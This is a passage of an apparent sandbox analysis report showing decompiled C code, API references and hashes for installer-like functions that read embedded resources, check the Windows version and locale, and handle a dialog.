                                                                                                                                                                                                                                            							E010D171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
                                                                                                                                                                                                                                            							_t46 = 0;
                                                                                                                                                                                                                                            							continue;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					L12:
                                                                                                                                                                                                                                            					return E010D6CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				goto L12;
                                                                                                                                                                                                                                            			}






















                                                                                                                                                                                                                                            0x010d6298
                                                                                                                                                                                                                                            0x010d62a0
                                                                                                                                                                                                                                            0x010d62a7
                                                                                                                                                                                                                                            0x010d62ad
                                                                                                                                                                                                                                            0x010d62af
                                                                                                                                                                                                                                            0x010d62bb
                                                                                                                                                                                                                                            0x010d62c3
                                                                                                                                                                                                                                            0x010d62c4
                                                                                                                                                                                                                                            0x010d633b
                                                                                                                                                                                                                                            0x010d633b
                                                                                                                                                                                                                                            0x010d6345
                                                                                                                                                                                                                                            0x010d634d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d62da
                                                                                                                                                                                                                                            0x010d62de
                                                                                                                                                                                                                                            0x010d635f
                                                                                                                                                                                                                                            0x010d6369
                                                                                                                                                                                                                                            0x010d62e0
                                                                                                                                                                                                                                            0x010d62e0
                                                                                                                                                                                                                                            0x010d62e0
                                                                                                                                                                                                                                            0x010d62e3
                                                                                                                                                                                                                                            0x010d62e5
                                                                                                                                                                                                                                            0x010d62e5
                                                                                                                                                                                                                                            0x010d62e8
                                                                                                                                                                                                                                            0x010d62e8
                                                                                                                                                                                                                                            0x010d62ea
                                                                                                                                                                                                                                            0x010d62eb
                                                                                                                                                                                                                                            0x010d62ef
                                                                                                                                                                                                                                            0x010d62f1
                                                                                                                                                                                                                                            0x010d62f3
                                                                                                                                                                                                                                            0x010d6302
                                                                                                                                                                                                                                            0x010d6308
                                                                                                                                                                                                                                            0x010d630d
                                                                                                                                                                                                                                            0x010d6314
                                                                                                                                                                                                                                            0x010d6314
                                                                                                                                                                                                                                            0x010d6316
                                                                                                                                                                                                                                            0x010d6319
                                                                                                                                                                                                                                            0x010d6355
                                                                                                                                                                                                                                            0x010d6357
                                                                                                                                                                                                                                            0x010d631b
                                                                                                                                                                                                                                            0x010d631b
                                                                                                                                                                                                                                            0x010d6331
                                                                                                                                                                                                                                            0x010d6334
                                                                                                                                                                                                                                            0x010d6339
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d6339
                                                                                                                                                                                                                                            0x010d6319
                                                                                                                                                                                                                                            0x010d636b
                                                                                                                                                                                                                                            0x010d637d
                                                                                                                                                                                                                                            0x010d637d
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 010D171E: _vsnprintf.MSVCRT ref: 010D1750
                                                                                                                                                                                                                                            • LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,010D51CA,00000004,00000024,010D2F71,?,00000002,00000000), ref: 010D62CD
                                                                                                                                                                                                                                            • LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,010D51CA,00000004,00000024,010D2F71,?,00000002,00000000), ref: 010D62D4
                                                                                                                                                                                                                                            • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,010D51CA,00000004,00000024,010D2F71,?,00000002,00000000), ref: 010D631B
                                                                                                                                                                                                                                            • FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 010D6345
                                                                                                                                                                                                                                            • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,010D51CA,00000004,00000024,010D2F71,?,00000002,00000000), ref: 010D6357
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$Free$FindLoadLock_vsnprintf
                                                                                                                                                                                                                                            • String ID: UPDFILE%lu
                                                                                                                                                                                                                                            • API String ID: 2922116661-2329316264
                                                                                                                                                                                                                                            • Opcode ID: 5b8f3b9528e3a6f45a81d147806e22adb3b97cc454c0e9938dd83829476ec852
                                                                                                                                                                                                                                            • Instruction ID: eafcae948d7a83224712c047b25765c22b6ee6561c54dea6767eddbb8e272d05
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5b8f3b9528e3a6f45a81d147806e22adb3b97cc454c0e9938dd83829476ec852
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1021B175A01319ABDB209FA5DC459FEBB78FF49714B004159FA82A3201DB3B99028BE0
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                                                                                            			E010D681F(void* __ebx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v20;
                                                                                                                                                                                                                                            				struct _OSVERSIONINFOA _v168;
                                                                                                                                                                                                                                            				void* _v172;
                                                                                                                                                                                                                                            				int* _v176;
                                                                                                                                                                                                                                            				int _v180;
                                                                                                                                                                                                                                            				int _v184;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t19;
                                                                                                                                                                                                                                            				long _t31;
                                                                                                                                                                                                                                            				signed int _t35;
                                                                                                                                                                                                                                            				void* _t36;
                                                                                                                                                                                                                                            				intOrPtr _t41;
                                                                                                                                                                                                                                            				signed int _t44;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t36 = __ebx;
                                                                                                                                                                                                                                            				_t19 =  *0x10d8004; // 0xc2f4ed82
                                                                                                                                                                                                                                            				_v8 = _t19 ^ _t44;
                                                                                                                                                                                                                                            				_t41 =  *0x10d81d8; // 0xfffffffe
                                                                                                                                                                                                                                            				_t43 = 0;
                                                                                                                                                                                                                                            				_v180 = 0xc;
                                                                                                                                                                                                                                            				_v176 = 0;
                                                                                                                                                                                                                                            				if(_t41 == 0xfffffffe) {
                                                                                                                                                                                                                                            					 *0x10d81d8 = 0;
                                                                                                                                                                                                                                            					_v168.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                                                            					if(GetVersionExA( &_v168) == 0) {
                                                                                                                                                                                                                                            						L12:
                                                                                                                                                                                                                                            						_t41 =  *0x10d81d8; // 0xfffffffe
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t41 = 1;
                                                                                                                                                                                                                                            						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
                                                                                                                                                                                                                                            							goto L12;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t31 = RegQueryValueExA(_v172, 0x10d1140, 0,  &_v184,  &_v20,  &_v180);
                                                                                                                                                                                                                                            							_t43 = _t31;
                                                                                                                                                                                                                                            							RegCloseKey(_v172);
                                                                                                                                                                                                                                            							if(_t31 != 0) {
                                                                                                                                                                                                                                            								goto L12;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t40 =  &_v176;
                                                                                                                                                                                                                                            								if(E010D66F9( &_v20,  &_v176) == 0) {
                                                                                                                                                                                                                                            									goto L12;
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									_t35 = _v176 & 0x000003ff;
                                                                                                                                                                                                                                            									if(_t35 == 1 || _t35 == 0xd) {
                                                                                                                                                                                                                                            										 *0x10d81d8 = _t41;
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										goto L12;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E010D6CE0(_t41, _t36, _v8 ^ _t44, _t40, _t41, _t43);
                                                                                                                                                                                                                                            			}


















                                                                                                                                                                                                                                            0x010d681f
                                                                                                                                                                                                                                            0x010d682a
                                                                                                                                                                                                                                            0x010d6831
                                                                                                                                                                                                                                            0x010d6836
                                                                                                                                                                                                                                            0x010d683c
                                                                                                                                                                                                                                            0x010d683e
                                                                                                                                                                                                                                            0x010d6848
                                                                                                                                                                                                                                            0x010d6851
                                                                                                                                                                                                                                            0x010d685d
                                                                                                                                                                                                                                            0x010d6864
                                                                                                                                                                                                                                            0x010d6876
                                                                                                                                                                                                                                            0x010d693a
                                                                                                                                                                                                                                            0x010d693a
                                                                                                                                                                                                                                            0x010d687c
                                                                                                                                                                                                                                            0x010d687e
                                                                                                                                                                                                                                            0x010d6885
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d68d6
                                                                                                                                                                                                                                            0x010d68f4
                                                                                                                                                                                                                                            0x010d6900
                                                                                                                                                                                                                                            0x010d6902
                                                                                                                                                                                                                                            0x010d690a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d690c
                                                                                                                                                                                                                                            0x010d690c
                                                                                                                                                                                                                                            0x010d691c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d691e
                                                                                                                                                                                                                                            0x010d6924
                                                                                                                                                                                                                                            0x010d692b
                                                                                                                                                                                                                                            0x010d6932
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d692b
                                                                                                                                                                                                                                            0x010d691c
                                                                                                                                                                                                                                            0x010d690a
                                                                                                                                                                                                                                            0x010d6885
                                                                                                                                                                                                                                            0x010d6876
                                                                                                                                                                                                                                            0x010d6951

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetVersionExA.KERNEL32(?,00000000,00000002), ref: 010D686E
                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(0000004A), ref: 010D68A7
                                                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 010D68CC
                                                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,010D1140,00000000,?,?,0000000C), ref: 010D68F4
                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 010D6902
                                                                                                                                                                                                                                              • Part of subcall function 010D66F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,010D691A), ref: 010D6741
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            • Control Panel\Desktop\ResourceLocale, xrefs: 010D68C2
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                                                                                                                                                                                                            • String ID: Control Panel\Desktop\ResourceLocale
                                                                                                                                                                                                                                            • API String ID: 3346862599-1109908249
                                                                                                                                                                                                                                            • Opcode ID: a1ddcb2fabe611b4c590f6752fbda34e1d5e9525309e79f661a6c679b1f92d4a
                                                                                                                                                                                                                                            • Instruction ID: 35dbbeb920bfdb71449df6871520d112ff26c760ebba1734d82daf2e57241b1d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a1ddcb2fabe611b4c590f6752fbda34e1d5e9525309e79f661a6c679b1f92d4a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F331BF31A01328DFDB31DB25CC04BEABBBCEB45728F0441E5E9C9A2240DB369A85CF51
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E010D3A3F(void* __eflags) {
                                                                                                                                                                                                                                            				void* _t3;
                                                                                                                                                                                                                                            				void* _t9;
                                                                                                                                                                                                                                            				CHAR* _t16;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t16 = "LICENSE";
                                                                                                                                                                                                                                            				_t1 = E010D468F(_t16, 0, 0) + 1; // 0x1
                                                                                                                                                                                                                                            				_t3 = LocalAlloc(0x40, _t1);
                                                                                                                                                                                                                                            				 *0x10d8d4c = _t3;
                                                                                                                                                                                                                                            				if(_t3 != 0) {
                                                                                                                                                                                                                                            					_t19 = _t16;
                                                                                                                                                                                                                                            					if(E010D468F(_t16, _t3, _t28) != 0) {
                                                                                                                                                                                                                                            						if(lstrcmpA( *0x10d8d4c, "<None>") == 0) {
                                                                                                                                                                                                                                            							LocalFree( *0x10d8d4c);
                                                                                                                                                                                                                                            							L9:
                                                                                                                                                                                                                                            							 *0x10d9124 = 0;
                                                                                                                                                                                                                                            							return 1;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t9 = E010D6517(_t19, 0x7d1, 0, E010D3100, 0, 0);
                                                                                                                                                                                                                                            						LocalFree( *0x10d8d4c);
                                                                                                                                                                                                                                            						if(_t9 != 0) {
                                                                                                                                                                                                                                            							goto L9;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						 *0x10d9124 = 0x800704c7;
                                                                                                                                                                                                                                            						L2:
                                                                                                                                                                                                                                            						return 0;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					E010D44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            					LocalFree( *0x10d8d4c);
                                                                                                                                                                                                                                            					 *0x10d9124 = 0x80070714;
                                                                                                                                                                                                                                            					goto L2;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				E010D44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            				 *0x10d9124 = E010D6285();
                                                                                                                                                                                                                                            				goto L2;
                                                                                                                                                                                                                                            			}






                                                                                                                                                                                                                                            0x010d3a46
                                                                                                                                                                                                                                            0x010d3a57
                                                                                                                                                                                                                                            0x010d3a5d
                                                                                                                                                                                                                                            0x010d3a63
                                                                                                                                                                                                                                            0x010d3a6a
                                                                                                                                                                                                                                            0x010d3a91
                                                                                                                                                                                                                                            0x010d3a9a
                                                                                                                                                                                                                                            0x010d3ad8
                                                                                                                                                                                                                                            0x010d3b13
                                                                                                                                                                                                                                            0x010d3b19
                                                                                                                                                                                                                                            0x010d3b1b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d3b21
                                                                                                                                                                                                                                            0x010d3ae7
                                                                                                                                                                                                                                            0x010d3af4
                                                                                                                                                                                                                                            0x010d3afc
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d3afe
                                                                                                                                                                                                                                            0x010d3a87
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d3a87
                                                                                                                                                                                                                                            0x010d3aa8
                                                                                                                                                                                                                                            0x010d3ab3
                                                                                                                                                                                                                                            0x010d3ab9
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d3ab9
                                                                                                                                                                                                                                            0x010d3a78
                                                                                                                                                                                                                                            0x010d3a82
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 010D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010D46A0
                                                                                                                                                                                                                                              • Part of subcall function 010D468F: SizeofResource.KERNEL32(00000000,00000000,?,010D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010D46A9
                                                                                                                                                                                                                                              • Part of subcall function 010D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010D46C3
                                                                                                                                                                                                                                              • Part of subcall function 010D468F: LoadResource.KERNEL32(00000000,00000000,?,010D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010D46CC
                                                                                                                                                                                                                                              • Part of subcall function 010D468F: LockResource.KERNEL32(00000000,?,010D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010D46D3
                                                                                                                                                                                                                                              • Part of subcall function 010D468F: memcpy_s.MSVCRT ref: 010D46E5
                                                                                                                                                                                                                                              • Part of subcall function 010D468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010D46EF
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,010D2F64,?,00000002,00000000), ref: 010D3A5D
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 010D3AB3
                                                                                                                                                                                                                                              • Part of subcall function 010D44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010D4518
                                                                                                                                                                                                                                              • Part of subcall function 010D44B9: MessageBoxA.USER32(?,?,010D9154,00010010), ref: 010D4554
                                                                                                                                                                                                                                              • Part of subcall function 010D6285: GetLastError.KERNEL32(010D5BBC), ref: 010D6285
                                                                                                                                                                                                                                            • lstrcmpA.KERNEL32(<None>,00000000), ref: 010D3AD0
                                                                                                                                                                                                                                            • LocalFree.KERNEL32 ref: 010D3B13
                                                                                                                                                                                                                                              • Part of subcall function 010D6517: FindResourceA.KERNEL32(?,000007D6,00000005), ref: 010D652A
                                                                                                                                                                                                                                              • Part of subcall function 010D6517: LoadResource.KERNEL32(?,00000000,?,?,010D2EE8,00000000,010D19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 010D6538
                                                                                                                                                                                                                                              • Part of subcall function 010D6517: DialogBoxIndirectParamA.USER32(?,00000000,00000547,010D19E0,00000000), ref: 010D6557
                                                                                                                                                                                                                                              • Part of subcall function 010D6517: FreeResource.KERNEL32(00000000,?,?,010D2EE8,00000000,010D19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 010D6560
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,010D3100,00000000,00000000), ref: 010D3AF4
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                                                                                                                                                                                                            • String ID: <None>$LICENSE
                                                                                                                                                                                                                                            • API String ID: 2414642746-383193767
                                                                                                                                                                                                                                            • Opcode ID: ff89d49b2123b624564249f13ae596b4a9ea1d06d5522cd3a10469d01ce8c5a6
                                                                                                                                                                                                                                            • Instruction ID: 4dd91eac1c6de813060fe98d8434212d624c28c95947da7688c0a5efd10f17b9
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ff89d49b2123b624564249f13ae596b4a9ea1d06d5522cd3a10469d01ce8c5a6
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D2118774702301ABD7346F7A9C09E5B3AF9EBD5750B00442EBDC5DA598DA7F88008765
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                                                                                            			E010D24E0(void* __ebx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t7;
                                                                                                                                                                                                                                            				void* _t20;
                                                                                                                                                                                                                                            				long _t26;
                                                                                                                                                                                                                                            				signed int _t27;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t20 = __ebx;
                                                                                                                                                                                                                                            				_t7 =  *0x10d8004; // 0xc2f4ed82
                                                                                                                                                                                                                                            				_v8 = _t7 ^ _t27;
                                                                                                                                                                                                                                            				_t25 = 0x104;
                                                                                                                                                                                                                                            				_t26 = 0;
                                                                                                                                                                                                                                            				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                                                            					E010D658A( &_v268, 0x104, "wininit.ini");
                                                                                                                                                                                                                                            					WritePrivateProfileStringA(0, 0, 0,  &_v268);
                                                                                                                                                                                                                                            					_t25 = _lopen( &_v268, 0x40);
                                                                                                                                                                                                                                            					if(_t25 != 0xffffffff) {
                                                                                                                                                                                                                                            						_t26 = _llseek(_t25, 0, 2);
                                                                                                                                                                                                                                            						_lclose(_t25);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E010D6CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
                                                                                                                                                                                                                                            			}











                                                                                                                                                                                                                                            0x010d24e0
                                                                                                                                                                                                                                            0x010d24eb
                                                                                                                                                                                                                                            0x010d24f2
                                                                                                                                                                                                                                            0x010d24f7
                                                                                                                                                                                                                                            0x010d2504
                                                                                                                                                                                                                                            0x010d250e
                                                                                                                                                                                                                                            0x010d251d
                                                                                                                                                                                                                                            0x010d252c
                                                                                                                                                                                                                                            0x010d2541
                                                                                                                                                                                                                                            0x010d2546
                                                                                                                                                                                                                                            0x010d2553
                                                                                                                                                                                                                                            0x010d2555
                                                                                                                                                                                                                                            0x010d2555
                                                                                                                                                                                                                                            0x010d2546
                                                                                                                                                                                                                                            0x010d256c

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 010D2506
                                                                                                                                                                                                                                            • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 010D252C
                                                                                                                                                                                                                                            • _lopen.KERNEL32(?,00000040), ref: 010D253B
                                                                                                                                                                                                                                            • _llseek.KERNEL32(00000000,00000000,00000002), ref: 010D254C
                                                                                                                                                                                                                                            • _lclose.KERNEL32(00000000), ref: 010D2555
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                                                                                                                                                                                                            • String ID: wininit.ini
                                                                                                                                                                                                                                            • API String ID: 3273605193-4206010578
                                                                                                                                                                                                                                            • Opcode ID: 2d000250fcac8232e402b08febc167d1b3bc335904bf92b82dba539bf00b14c5
                                                                                                                                                                                                                                            • Instruction ID: a2bd71e73a5d6698a95c03ab6920b2123968415a0a55d991d4d4ac23e9b9c915
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2d000250fcac8232e402b08febc167d1b3bc335904bf92b82dba539bf00b14c5
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 28015232701218A7D7309A699C08EEB7FBCDB55750F440195FA89D3184DA798A458BA0
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E010D3450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                                                                                                                                                                                            				void* _t7;
                                                                                                                                                                                                                                            				void* _t11;
                                                                                                                                                                                                                                            				struct HWND__* _t12;
                                                                                                                                                                                                                                            				int _t22;
                                                                                                                                                                                                                                            				struct HWND__* _t24;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t7 = _a8 - 0x10;
                                                                                                                                                                                                                                            				if(_t7 == 0) {
                                                                                                                                                                                                                                            					EndDialog(_a4, 2);
                                                                                                                                                                                                                                            					L11:
                                                                                                                                                                                                                                            					return 1;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t11 = _t7 - 0x100;
                                                                                                                                                                                                                                            				if(_t11 == 0) {
                                                                                                                                                                                                                                            					_t12 = GetDesktopWindow();
                                                                                                                                                                                                                                            					_t24 = _a4;
                                                                                                                                                                                                                                            					E010D43D0(_t24, _t12);
                                                                                                                                                                                                                                            					SetWindowTextA(_t24, 0x10d9154);
                                                                                                                                                                                                                                            					SetDlgItemTextA(_t24, 0x838,  *0x10d9404);
                                                                                                                                                                                                                                            					SetForegroundWindow(_t24);
                                                                                                                                                                                                                                            					goto L11;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(_t11 == 1) {
                                                                                                                                                                                                                                            					_t22 = _a12;
                                                                                                                                                                                                                                            					if(_t22 < 6) {
                                                                                                                                                                                                                                            						goto L11;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(_t22 <= 7) {
                                                                                                                                                                                                                                            						L8:
                                                                                                                                                                                                                                            						EndDialog(_a4, _t22);
                                                                                                                                                                                                                                            						return 1;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(_t22 != 0x839) {
                                                                                                                                                                                                                                            						goto L11;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					 *0x10d91dc = 1;
                                                                                                                                                                                                                                            					goto L8;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                                            			}








                                                                                                                                                                                                                                            0x010d3459
                                                                                                                                                                                                                                            0x010d345c
                                                                                                                                                                                                                                            0x010d34d8
                                                                                                                                                                                                                                            0x010d34de
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d34e0
                                                                                                                                                                                                                                            0x010d345e
                                                                                                                                                                                                                                            0x010d3463
                                                                                                                                                                                                                                            0x010d349a
                                                                                                                                                                                                                                            0x010d34a0
                                                                                                                                                                                                                                            0x010d34a7
                                                                                                                                                                                                                                            0x010d34b2
                                                                                                                                                                                                                                            0x010d34c4
                                                                                                                                                                                                                                            0x010d34cb
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d34cb
                                                                                                                                                                                                                                            0x010d3468
                                                                                                                                                                                                                                            0x010d346e
                                                                                                                                                                                                                                            0x010d3474
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d347c
                                                                                                                                                                                                                                            0x010d348c
                                                                                                                                                                                                                                            0x010d3490
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d3496
                                                                                                                                                                                                                                            0x010d3484
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d3486
